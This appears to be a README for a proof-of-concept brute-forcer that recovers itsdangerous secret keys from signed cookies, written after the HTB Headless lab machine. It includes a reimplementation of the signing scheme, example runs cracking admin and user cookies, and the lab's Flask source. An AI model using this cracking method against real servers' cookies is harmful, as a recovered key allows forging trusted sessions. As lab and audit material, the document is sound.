A proof-of-concept Python script for cracking and obtaining itsdangerous library secret keys by brute-forcing cookies handed out by the server to users. It does not directly depend on the data type or the data itself.
I spent a couple of hours on HTB Headless (a really Easy machine) chasing a rabbit hole. The rabbit hole was this: I realized that the cookie value given by the server contained the data needed to authenticate to the dashboard and was signed. In real life (most of the time) these signed cookies are either generated by Flask (in a JWT-like format that starts with ey) or by some other library like Werkzeug secure cookies.
After solving the box I realized it was the itsdangerous library, and I could not find any direct cracker for that kind of signing. This repository is a proof of concept that takes the server-given value and signs it (brute-forcing) until it gets the same signature cookie, to obtain the secret key used for the signing process.
It should be noted that this is not the intended (or a possible) way to solve this machine, since the secret key used by the server is relatively safe and long.
itsdangerous is a library that can be used to send and receive data in untrusted environments. Given a key only you know, you can cryptographically sign your data and hand it over to someone else. When you get the data back you can ensure that nobody tampered with it. The receiver can see the data, but they cannot modify it unless they also have your key. So if you keep the key secret and complex, you will be fine.
Although really inefficient and not that complicated, this script uses the itsdangerous signing process to brute-force the secret key used by the server:
- Get the user-supplied cookie,
- Parse the cookie to obtain the data section,
- Take each candidate secret key from the user-supplied wordlist and sign the data with it,
- Compare the resulting signature with the cookie's signature to see whether they match.
This script only supports the DATA.SIGNATURE format, and thus does not take into account other possible parameters such as timestamps, or other server-side checks done on the signature. I have no intention of investing more time in this, but PRs are always appreciated.
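The signing scheme those steps brute-force, reimplemented with the standard library as an added example (not code from this repository) so the DATA.SIGNATURE format can be checked by hand. It assumes the itsdangerous defaults (salt b"itsdangerous", HMAC-SHA1, and the "django-concat" key derivation) and uses constructed keys; the last function is the per-candidate check the PoC loop performs, written here as a self-audit of whether a deployed key appears in a common wordlist.

```python
import base64
import hashlib
import hmac
import json

# Added example, not the repository's script: a stdlib re-implementation of the
# signing that itsdangerous.URLSafeSerializer performs with its defaults
# (salt b"itsdangerous", HMAC-SHA1, key derivation sha1(salt + b"signer" + key)).
# Timestamped (DATA.TIMESTAMP.SIGNATURE) and zlib-compressed payloads
# (payload starting with ".") are deliberately not handled, as in the PoC.
SALT = b"itsdangerous"

def b64(raw: bytes) -> bytes:
    """URL-safe base64 with the '=' padding stripped, as itsdangerous writes it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

def unb64(enc: bytes) -> bytes:
    """Inverse of b64(): restore the padding before decoding."""
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))

def signature_for(payload: bytes, secret_key: bytes, salt: bytes = SALT) -> bytes:
    """SIGNATURE part: HMAC-SHA1 over the payload, keyed by a hash of salt and key."""
    derived = hashlib.sha1(salt + b"signer" + secret_key).digest()
    return b64(hmac.new(derived, payload, hashlib.sha1).digest())

def sign(obj, secret_key: bytes) -> str:
    """Build DATA.SIGNATURE for a JSON-serialisable object ("admin" -> ImFkbWluIg.<sig>)."""
    payload = b64(json.dumps(obj, separators=(",", ":")).encode())
    return (payload + b"." + signature_for(payload, secret_key)).decode()

def verify(cookie: str, secret_key: bytes):
    """Return the decoded data if the signature matches secret_key, otherwise None."""
    payload, _, sig = cookie.encode().rpartition(b".")
    # constant-time comparison, as itsdangerous does in Signer.verify_signature
    if not sig or not hmac.compare_digest(sig, signature_for(payload, secret_key)):
        return None
    return json.loads(unb64(payload))

def key_in_wordlist(cookie: str, candidates):
    """The check the PoC runs per wordlist entry: the first key that validates, or None.
    Useful as a self-audit: a deployed key that shows up here needs rotating."""
    for key in candidates:
        if verify(cookie, key) is not None:
            return key
    return None
```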
This is an example usage for brute-forcing itsdangerous cookies handed out by servers in the DATA.SIGNATURE format, without any additional salting or timestamps. Some example wordlists can be found under wordlists/. The file wordlists/chars_27_50000.txt contains the secret key used by HTB Headless.
```
~/pentest/itsdangerouscracker ☿ python3 itsdangerouscracker.py -c 'ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0' -w wordlists/chars_27_50000.txt
Data Section: ImFkbWluIg==
Sanitized Data Section: admin
Signature Section: dmzDkZNEm6CK0oyL1fbM-SnXpH0
Testing key: Pc*SNIP*7A
==================================
The key is cracked: Pc*SNIP*7A
```
Since the signing is done using only the data and the secret key, the same can also be applied to the user cookie.
```
~/pentest/itsdangerouscracker ☿ python3 itsdangerouscracker.py -c 'InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs' -w wordlists/chars_27_50000.txt
Data Section: InVzZXIi====
Sanitized Data Section: user
Signature Section: uAlmXlTvm8vyihjNaPDWnvB_Zfs
Testing key: Pc*SNIP*7A
==================================
The key is cracked: Pc*SNIP*7A
```
Once the key is cracked, you can forge your own cookies with data of your choosing that the server trusts directly. This script does not support (and probably never will support) cookie forging.
```
usage: itsdangerouscracker.py [-h] -c COOKIE -w WORDLIST

A proof of concept script for cracking and obtainig itsdangerous library secret keys by brute forcing user cookies submited by server. This script assumes no timestamp is used and the cookie in DATA.SIGNATURE format.

options:
  -h, --help            show this help message and exit
  -c COOKIE, --cookie COOKIE
                        The cookie given by the server to user. In quotes.
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist that contains possible secret keys that will be used for cracking.

Example Usage:
python3 itsdangerouscracker.py -c 'InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs' -w wordlists/chars_27_50000.txt
python3 itsdangerouscracker.py -c 'ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0' -w wordlists/chars_27_50000.txt
```
HTB Headless is a really good, ready-made example for understanding, in a very basic way, how signed cookies work under the hood with itsdangerous. The source code the machine uses for this process is given below. The machine is hosted on HTB as Headless, and its author (presumably also the author of this code block) is HTB user dvir.
```python
from flask import Flask, render_template, request, make_response, abort, send_file
from itsdangerous import URLSafeSerializer
import os
import random

app = Flask(__name__, template_folder=".")
app.secret_key = b'Pc*SNIP*7A'
# Plain URLSafeSerializer: no timestamp, so cookies are DATA.SIGNATURE only
serializer = URLSafeSerializer(app.secret_key)

hacking_reports_dir = '/home/dvir/app/hacking_reports'
os.makedirs(hacking_reports_dir, exist_ok=True)

@app.route('/')
def index():
    # Only requests from localhost receive the "admin" token
    client_ip = request.remote_addr
    is_admin = True if client_ip in ['127.0.0.1', '::1'] else False
    token = "admin" if is_admin else "user"
    # The token string itself is the signed data ("admin" -> ImFkbWluIg.<signature>)
    serialized_value = serializer.dumps(token)
    response = make_response(render_template('index.html', is_admin=token))
    response.set_cookie('is_admin', serialized_value, httponly=False)
    return response
```